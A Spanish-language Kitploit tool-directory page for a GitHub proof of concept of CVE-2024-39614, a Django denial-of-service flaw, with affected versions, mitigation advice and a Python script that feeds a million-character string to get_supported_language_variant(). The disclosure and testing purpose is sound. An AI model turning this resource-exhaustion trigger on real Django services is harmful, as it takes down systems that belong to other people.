Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
-CVE-2024-39614 — Prueba de concepto para CVE-2024-39614, una vulnerabilidad de denegación de servicio en Django. Demuestra agotamiento de recursos mediante cadenas largas en get_supported_language_variant(), afectando a Django antes de 5.0.7 y 4.2.14. | Kitploit
Herramientas/GitHubGitHub/abdurahmon3236/-cve-2024-39614
Análisis de VulnerabilidadesExplotaciónSeguridad WebPruebas de Penetración
GitHubabdurahmon3236/-cve-2024-39614

-CVE-2024-39614

Prueba de concepto para CVE-2024-39614, una vulnerabilidad de denegación de servicio en Django. Demuestra agotamiento de recursos mediante cadenas largas en get_supported_language_variant(), afectando a Django antes de 5.0.7 y 4.2.14.

Ver Repositorio
11hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Prueba de Concepto (PoC) para la Vulnerabilidad de Denegación de Servicio en Django

Este repositorio contiene un script de Prueba de Concepto (PoC) que demuestra una vulnerabilidad de denegación de servicio (DoS) en Django versiones 5.0 anteriores a 5.0.7 y 4.2 anteriores a 4.2.14. La vulnerabilidad radica en la función get_supported_language_variant(), la cual es susceptible a un potencial ataque DoS al manejar cadenas muy largas que contienen caracteres específicos.

Tabla de Contenidos

  • Descripción de la Vulnerabilidad
  • Configuración y Uso
    • Script PoC
  • Consideraciones Importantes
  • Mitigación

Descripción de la Vulnerabilidad

CVE-ID: (Pendiente)

Resumen: La función get_supported_language_variant() en Django versiones 5.0 anteriores a 5.0.7 y 4.2 anteriores a 4.2.14 es vulnerable a un ataque de denegación de servicio. Esta función puede ser explotada enviando cadenas muy largas que contienen caracteres específicos, lo que podría llevar a un agotamiento de recursos y, consecuentemente, a una condición de denegación de servicio.

Versiones Afectadas:

  • Django 5.0 anterior a 5.0.7
  • Django 4.2 anterior a 4.2.14

Versiones Corregidas:

  • Django 5.0.7
  • Django 4.2.14

Configuración y Uso

Requisitos Previos

  • Python 3.x
  • Django instalado (pip install django)

Script PoC

Este script demuestra cómo un atacante puede explotar la vulnerabilidad enviando una cadena muy larga a la función get_supported_language_variant().

Guarde el siguiente script como dos_poc.py y ejecútelo.

root@kitploit:~
import django
from django.utils.translation import get_supported_language_variant

# Check Django version
if django.VERSION < (4, 2, 14) or (5, 0) <= django.VERSION < (5, 0, 7):
    print("[-] This Django version is vulnerable to the DoS attack.")
else:
    print("[+] This Django version is not vulnerable. Please use a vulnerable version for testing.")

# Generate a very long string containing specific characters
very_long_string = 'a' * 1000000 + '!'  # Adjust the length and content as necessary

def test_dos_vulnerability():
    try:
        # Trigger the vulnerability
        get_supported_language_variant(very_long_string)
        print("[+] Successfully called get_supported_language_variant with a very long string.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    test_dos_vulnerability()

Explicación

  1. Verificar Versión de Django: El script primero verifica si la versión instalada de Django es vulnerable al ataque DoS.
  2. Generar una Cadena Muy Larga: Se genera una cadena muy larga que contiene caracteres específicos. Ajuste la longitud y el contenido según sea necesario para activar la vulnerabilidad.
  3. Función de Prueba: La función test_dos_vulnerability() llama a get_supported_language_variant() con la cadena muy larga para probar la vulnerabilidad.
  4. Ejecutar el Script: Cuando se ejecuta, el script intentará explotar la vulnerabilidad e imprimirá los resultados.

Consideraciones Importantes

  • Permisos: Asegúrese de tener permiso explícito para probar esta vulnerabilidad en el sistema objetivo. Las pruebas no autorizadas son ilegales y poco éticas.
  • Entorno de Pruebas: Realice esta prueba en un entorno controlado para evitar afectar sistemas de producción.
  • Consumo de Recursos: Este PoC puede consumir recursos significativos del sistema. Supervise su sistema y esté preparado para detener el script si es necesario.

Mitigación

Para mitigar esta vulnerabilidad, actualice a las versiones corregidas de Django:

  • Django 5.0.7
  • Django 4.2.14

Siga las instrucciones oficiales de actualización de Django para actualizar su instalación de Django a la versión segura más reciente.

Manteniendo su software actualizado y siguiendo las mejores prácticas de seguridad, puede prevenir vulnerabilidades como este problema de DoS en Django.

Descargar herramienta